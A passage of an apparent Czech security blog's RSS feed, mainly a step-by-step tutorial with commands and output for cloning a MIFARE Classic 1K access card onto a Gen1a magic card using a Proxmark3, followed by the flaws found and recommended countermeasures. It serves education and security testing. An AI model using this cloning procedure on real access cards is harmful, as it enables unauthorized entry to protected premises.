<p>Výzkum pokračuje ve vývoji pokročilejších útočných technik i obranných opatření. <strong>Kvantové výpočty a AI/ML detekční systémy</strong> představují budoucí směry jak pro útočníky, tak obránce. Pro bezpečnostní specialisty je kritické <strong>udržovat si aktuální znalosti</strong> těchto vyvíjejících se hrozeb a implementovat proaktivní obranné strategie.</p>
<p><strong>Klíčová doporučení</strong> zahrnují okamžité posouzení všech RFID systémů v infrastruktuře, implementaci dodatečných bezpečnostních vrstev, plánování migrace na moderní standardy s kvantově odolnou kryptografií, a vytvoření kontinuálních monitorovacích procesů pro detekci potenciálních útoků. Pouze proaktivní přístup k těmto fundamentálním bezpečnostním slabinám může chránit kritické systémy před stále se vyvíjejícími hrozbami.</p>

<div class="twitter-share"><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2Fwww.hardwired.dev%2F2025%2F09%2F14%2Fkryptograficke-utoky-nfc%2F&#038;via=hessevalentino&#038;related=hessevalentino%3AValentino%20Hesse%20OK2HSS" class="twitter-share-button">Tweet</a></div><p>The post <a href="https://www.hardwired.dev/2025/09/14/kryptograficke-utoky-nfc/">Kryptografické útoky NFC</a> first appeared on <a href="https://www.hardwired.dev">Hard Wired</a>.</p>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Postup klonování MIFARE Clasic 1K</title>
		<link>https://www.hardwired.dev/2025/01/04/postup-klonovani-mifare-clasic-1k/</link>
		
		<dc:creator><![CDATA[Valentino Hesse OK2HSS]]></dc:creator>
		<pubDate>Sat, 04 Jan 2025 17:44:58 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[access-control]]></category>
		<category><![CDATA[educational]]></category>
		<category><![CDATA[laboratory-research]]></category>
		<category><![CDATA[magic-card]]></category>
		<category><![CDATA[mifare-classic]]></category>
		<category><![CDATA[nfc-testing]]></category>
		<category><![CDATA[penetration-testing]]></category>
		<category><![CDATA[Proxmark3]]></category>
		<category><![CDATA[rfid-security]]></category>
		<category><![CDATA[security-research]]></category>
		<guid isPermaLink="false">https://www.hardwired.dev/?p=2556</guid>

					<description><![CDATA[<p>Postup klonování MIFARE karty Úvod Tento dokument popisuje postup klonování MIFARE karty pomocí Proxmark3. Všechny kroky musí být prováděny pod &#62;&#62;&#62;</p>
<p>The post <a href="https://www.hardwired.dev/2025/01/04/postup-klonovani-mifare-clasic-1k/">Postup klonování MIFARE Clasic 1K</a> first appeared on <a href="https://www.hardwired.dev">Hard Wired</a>.</p>]]></description>
										<content:encoded><![CDATA[<div id="bsf_rt_marker"></div><h1>Postup klonování MIFARE karty</h1>
<h2>Úvod</h2>
<p>Tento dokument popisuje postup klonování MIFARE karty pomocí Proxmark3. Všechny kroky musí být prováděny pod dohledem oprávněné osoby a pouze pro výukové a testovací účely.</p>
<h3>Důležité upozornění k typu karty</h3>
<p>Pro úspěšné klonování je <strong>nutné</strong> použít speciální typ karty označovaný jako &quot;Magic Card&quot;. Standardní MIFARE karty mají z výroby trvale uzamčené některé důležité oblasti:</p>
<ul>
<li>UID (unikátní identifikátor)</li>
<li>ATQA (Answer To Request Type A)</li>
<li>SAK (Select Acknowledge)</li>
<li>Výrobní blok (manufacturer block)</li>
</ul>
<p>Magic Card umožňuje:</p>
<ul>
<li>Změnu všech výše uvedených parametrů</li>
<li>Opakovaný zápis do normálně uzamčených oblastí</li>
<li>Emulaci různých typů MIFARE karet</li>
<li>Kompletní klonování včetně UID</li>
</ul>
<p>V našem postupu používáme Magic Card Gen1a, která je schopná emulovat MIFARE Classic 1K kartu včetně všech potřebných parametrů.</p>
<h3>MIFARE Classic 1K - Technická specifikace</h3>
<ul>
<li><strong>Paměť</strong>: 1024 bytů, organizovaných do 16 sektorů</li>
<li><strong>Struktura sektorů</strong>: Každý sektor obsahuje 4 bloky po 16 bytech</li>
<li><strong>Organizace</strong>:
<ul>
<li>Sektor 0, Blok 0: Obsahuje UID karty a výrobní data (pouze pro čtení)</li>
<li>Každý sektor má svůj vlastní Sector Trailer (poslední blok sektoru)</li>
<li>Sector Trailer obsahuje:</li>
<li>Klíč A (6 bytů)</li>
<li>Přístupová práva (4 byty)</li>
<li>Klíč B (6 bytů)</li>
</ul>
</li>
<li><strong>Pracovní frekvence</strong>: 13.56 MHz</li>
<li><strong>Komunikační rychlost</strong>: 106 kbit/s</li>
<li><strong>Dosah čtení</strong>: Typicky 10 cm</li>
<li><strong>Životnost</strong>: 100,000 cyklů zápisu</li>
<li><strong>Uchování dat</strong>: 10 let</li>
</ul>
<h3>Bezpečnostní vlastnosti</h3>
<ul>
<li>Unikátní 4bytové UID (7bytové pro některé verze)</li>
<li>Vzájemná tříprůchodová autentizace (Three-pass authentication)</li>
<li>Individuální přístupová práva pro každý paměťový blok</li>
<li>Šifrování komunikace pomocí algoritmu Crypto-1</li>
<li>Hardwarový generátor čísel pro autentizaci</li>
</ul>
<h2>Krok 1: Detekce původní karty</h2>
<p>Příkaz:</p>
<pre><code>[usb] pm3 --&gt; auto</code></pre>
<p>Výstup:</p>
<pre><code>[=] lf search
[=] hf search
[+] UID: 80 AF 20 AD
[+] ATQA: 00 04
[+] SAK: 08 [2]
[+] Magic capabilities : Gen 1a
[#] 1 static nonce 01200145</code></pre>
<p><strong>Poznámka:</strong> V tomto kroku jsme zjistili základní parametry karty:</p>
<ul>
<li>UID: 80AF20AD</li>
<li>ATQA: 0004</li>
<li>SAK: 08</li>
<li>Typ karty: Magic Card Gen1a</li>
</ul>
<h2>Krok 2: Kontrola klíčů původní karty</h2>
<p>Příkaz:</p>
<pre><code>[usb] pm3 --&gt; hf mf fchk --1k</code></pre>
<p>Výstup:</p>
<pre><code>[=] Running strategy 1
[=] Chunk 0.3s | found 32/32 keys (56)
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+]  000 | 003 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
...
[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1</code></pre>
<p><strong>Poznámka:</strong> Zjistili jsme, že všechny sektory používají defaultní klíč FFFFFFFFFFFF.</p>
<h2>Krok 3: Vytvoření dumpu původní karty</h2>
<p>Příkaz pro uložení dumpu:</p>
<pre><code>[usb] pm3 --&gt; hf mf csave -f original_card_dump.eml</code></pre>
<p><strong>Poznámka:</strong> Tento krok vytvoří soubor s kompletním obsahem původní karty. Soubor se uloží do aktuálního adresáře.</p>
<h2>Krok 4: Příprava nové karty</h2>
<ol>
<li>Vložte novou kartu na čtečku</li>
<li>Nastavte UID, ATQA a SAK:
<pre><code>[usb] pm3 --&gt; hf mf csetuid -u 80AF20AD --atqa 0004 --sak 08</code></pre>
</li>
</ol>
<p>Výstup:</p>
<pre><code>[+] old block 0... 80AF20ADA2080400036EB27E57BF7590
[+] new block 0... 80AF20ADA2080400036EB27E57BF7590
[+] Old UID... 80 AF 20 AD
[+] New UID... 80 AF 20 AD  ( verified )</code></pre>
<h2>Krok 5: Zápis dat na novou kartu</h2>
<p>Příkaz pro nahrání dumpu:</p>
<pre><code>[usb] pm3 --&gt; hf mf cload -f original_card_dump.eml</code></pre>
<p><strong>Poznámka:</strong> Tímto nahrajeme kompletní obsah původní karty na novou kartu.</p>
<h2>Krok 6: Ověření</h2>
<p>Pro ověření úspěšnosti klonování můžeme použít:</p>
<pre><code>[usb] pm3 --&gt; hf mf cview</code></pre>
<p><a href="https://www.hardwired.dev/wp-content/uploads/2025/01/Hesse-Valentino.webp"><img decoding="async" src="https://www.hardwired.dev/wp-content/uploads/2025/01/Hesse-Valentino-1024x576.webp" alt="" /></a></p>
<h2>Důležitá upozornění</h2>
<ol>
<li>Všechny operace musí být prováděny s kartou položenou na čtečce</li>
<li>Je nutné přesně dodržet syntaxi příkazů</li>
<li>Postup je určen pouze pro výukové a testovací účely</li>
<li>Při práci s kartami dbejte na správnou manipulaci</li>
<li>Průběžně kontrolujte úspěšnost jednotlivých kroků</li>
</ol>
<h2>Zjištěné bezpečnostní problémy</h2>
<ol>
<li>Použití defaultních klíčů (FFFFFFFFFFFF)</li>
<li>Implementace pouze UID autentizace</li>
<li>Přítomnost statického nonce</li>
<li>Možnost použití Magic Card pro klonování</li>
</ol>
<h2>Doporučená protiopatření</h2>
<ol>
<li>Změna defaultních klíčů</li>
<li>Implementace 3DES autentizace</li>
<li>Pravidelná rotace klíčů</li>
<li>Monitoring přístupů</li>
<li>Detekce pokusů o použití klonovaných karet</li>
</ol>

<div class="twitter-share"><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2Fwww.hardwired.dev%2F2025%2F01%2F04%2Fpostup-klonovani-mifare-clasic-1k%2F&#038;via=hessevalentino&#038;related=hessevalentino%3AValentino%20Hesse%20OK2HSS" class="twitter-share-button">Tweet</a></div><p>The post <a href="https://www.hardwired.dev/2025/01/04/postup-klonovani-mifare-clasic-1k/">Postup klonování MIFARE Clasic 1K</a> first appeared on <a href="https://www.hardwired.dev">Hard Wired</a>.</p>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
